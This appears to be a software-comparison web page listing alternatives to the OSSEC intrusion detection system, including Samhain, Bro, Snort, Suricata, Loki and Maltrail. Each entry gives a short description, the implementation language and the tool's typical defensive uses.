OSSEC alternatives

Looking for a better tool, or simply want to learn about alternatives? There is typically more than one option.

Alternatives (by tag)

56

Alternative: Samhain

Host-based intrusion detection system (HIDS) providing file integrity checking and log file monitoring

Samhain is a host-based intrusion detection system (HIDS). It provides file integrity checking and log file monitoring/analysis. Additional features are rootkit detection, port monitoring, detection of rogue SUID executables, and the detection of hidden processes.

Samhain is typically deployed as a standalone application, although it supports centralized logging. This makes it ideal for environments with multiple systems.

Samhain is open source software and written by Rainer Wichmann.

Project details

Strengths

  • + The source code of this software is available

Samhain project page

96

Alternative: Bro

Bro is a network security monitoring tool (NSM) and helps with monitoring. It can also play an active rol in performing forensics and incident response.

Project details

Bro is written in C++.

Strengths

  • + More than 25 contributors
  • + More than 1000 GitHub stars
  • + The source code of this software is available

Typical usage

  • security monitoring

Bro project page

56

Alternative: Pytbull (pytbull)

85

Alternative: Scirius

Scirius is a web application to do Suricata ruleset management. There is both a community version as paid version available.

Project details

Scirius is written in Python.

Strengths

  • + The source code of this software is available

Typical usage

  • network security monitoring

Scirius project page

74

Alternative: Snort

Snort is a network intrusion detection system (NIDS) that runs on Linux and other platforms.

Besides intrusion detection, Snort has the capabilities to prevent attacks by taking actions.

Project details

Snort is written in C.

Strengths

  • + Supported by a large company

Typical usage

  • security monitoring

Snort project page

100

Alternative: Suricata

Network threat detection engine that acts as intrusion detection (IDS), inline intrusion prevention (IPS), and network security monitoring (NSM)

Project details

Suricata is written in C, Lua.

Strengths

  • + More than 50 contributors
  • + The source code of this software is available

Typical usage

  • information gathering
  • intrusion detection
  • network analysis

Suricata project page

93

Alternative: Loki

Loki is security tool to find so-called indicators of compromise (IOC). It does this by scanning files and then uses pattern matching.

Project details

Loki is written in Python.

Strengths

  • + Commercial support available
  • + More than 10 contributors
  • + More than 500 GitHub stars
  • + The source code of this software is available

Typical usage

  • digital forensics
  • intrusion detection
  • security monitoring

Loki project page

64

Alternative: Maltrail

Maltrail monitors for traffic on the network that might indicate system compromise or other bad behavior. It is great for intrusion detection and monitoring.

Project details

Maltrail is written in Python.

Strengths

  • + The source code of this software is available

Weaknesses

  • - More than 10 contributors
  • - More than 2000 GitHub stars

Typical usage

  • intrusion detection
  • network analysis
  • security monitoring

Maltrail project page